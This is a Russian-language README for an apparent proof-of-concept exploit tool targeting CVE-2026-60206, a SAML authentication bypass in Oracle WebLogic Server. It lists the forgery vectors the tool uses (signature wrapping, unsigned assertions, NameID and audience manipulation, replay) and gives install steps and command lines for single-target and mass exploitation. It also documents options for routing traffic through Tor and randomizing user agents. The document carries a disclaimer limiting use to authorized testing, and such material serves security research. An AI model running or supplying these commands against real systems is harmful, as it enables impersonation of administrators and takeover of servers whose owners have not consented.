
Технический анализ и Proof-of-Concept для CVE-2026-60206 — критической уязвимости обхода аутентификации SAML в Oracle WebLogic Server.
Этот репозиторий предоставляет proof‑of‑concept эксплойт для CVE‑2026‑60206 — критической уязвимости обхода аутентификации в реализации SAML в Oracle WebLogic Server. Уязвимость позволяет удалённому злоумышленнику с низкими привилегиями полностью скомпрометировать сервер путём подделки SAML-утверждений (assertions).
⚠️ Предупреждение: Этот инструмент предназначен только для авторизованных исследований и тестирования безопасности. Используйте его исключительно против систем, которыми вы владеете или на тестирование которых у вас есть явное разрешение. Авторы не несут ответственности за неправомерное использование.
CVE-2026-60206 затрагивает компонент Core в Oracle WebLogic Server. Уязвимость вызвана некорректной обработкой аутентификации в реализации протокола SAML. Множество векторов атаки — таких как XML Signature Wrapping (XSW), принятие неподписанных утверждений, манипуляция NameID и обход ограничений audience/conditions — позволяют злоумышленнику выдавать себя за произвольных пользователей (например, weblogic) и получать административный доступ.
Затронутые версии:
PoC реализует следующие векторы атаки:
WantAssertionsSigned не принудительно включён).AudienceRestriction для расширения области действия.NotBefore/NotOnOrAfter для обхода проверок срока действия.all, unsigned, xsw, nameid, audience, conditions, combo или replay.-l).-r).httpx, если он установлен, в противном случае — requests (HTTP/1.1).--save-payloads).-c / --check) — быстрое определение уязвимости цели (без эксплуатации).git clone https://github.com/Debajyoti0-0/CVE-2026-60206.git
cd CVE-2026-60206
pip install -r requirements.txt
Обязательно: requests, urllib3
Опционально (расширяет функциональность):
httpx — для поддержки HTTP/2lxml — для улучшенного разбора SAMLsignxml, cryptography — для обработки подписей (не требуется для эксплуатации)python CVE-2026-60206.py -t https://192.168.1.100:7002 --detect
python CVE-2026-60206.py -t https://192.168.1.100:7002 --mode all -u weblogic
python CVE-2026-60206.py -t https://192.168.1.100:7002 --mode combo -u admin
python CVE-2026-60206.py -l targets.txt -o results.json
python CVE-2026-60206.py -l targets.txt --exploit -o results.csv --threads 20
python CVE-2026-60206.py -t https://192.168.1.100:7002 --mode replay --replay-file captured.xml
python CVE-2026-60206.py -t https://192.168.1.100:7002 --tor --check-tor
python CVE-2026-60206.py -t https://192.168.1.100:7002 -r request.txt --method POST
python CVE-2026-60206.py -t https://192.168.1.100:7002 -c
| Flag | Описание |
|---|---|
-h, --help | Показать справочное сообщение и выйти. |
--proxy PROXY | URL прокси (переопределяется --tor, если он используется). |
--no-verify | Отключить проверку SSL-сертификатов. |
--cookie COOKIE | Сессионные cookie (например, name=value; name2=value2). |
--auth AUTH | Учётные данные базовой аутентификации (USER:PASS). |
| Flag | Описание |
|---|---|
-t, --target TARGET | URL одиночной цели (например, https://host:7002). |
-l, --list LIST | Файл со списком целей для массового сканирования или одиночный URL. |
-f, --file FILE | Псевдоним для --list. |
| Flag | Описание |
|---|---|
-r, --requestfile REQUESTFILE | Загрузить сырой HTTP-запрос из файла (заменяет SAML-атаки). |
--method METHOD | Используемый HTTP-метод (для сырого или одиночного запроса; по умолчанию: GET). |
--random-agent | Использовать случайный User-Agent из встроенного списка. |
-A, --user-agent USER_AGENT | Собственное значение заголовка User-Agent. |
--tor | Использовать анонимную сеть Tor (SOCKS5 по умолчанию). |
--tor-port TOR_PORT | Порт прокси Tor (по умолчанию: 9050). |
--tor-type {HTTP,SOCKS4,SOCKS5} | Тип прокси Tor (по умолчанию: SOCKS5). |
--check-tor | Проверить, корректно ли используется Tor (выход с вердиктом). |
--delay DELAY | Задержка в секундах между запросами. |
--timeout TIMEOUT | Таймаут в секундах (по умолчанию: 30). |
--retries RETRIES | Количество повторов при таймауте/ошибках (по умолчанию: 3). |
--retry-on RETRY_ON | Повторить запрос, если содержимое ответа соответствует регулярному выражению (например, 'captcha'). |
-dr, --disable-redirects | Отключить переходы по HTTP-редиректам. |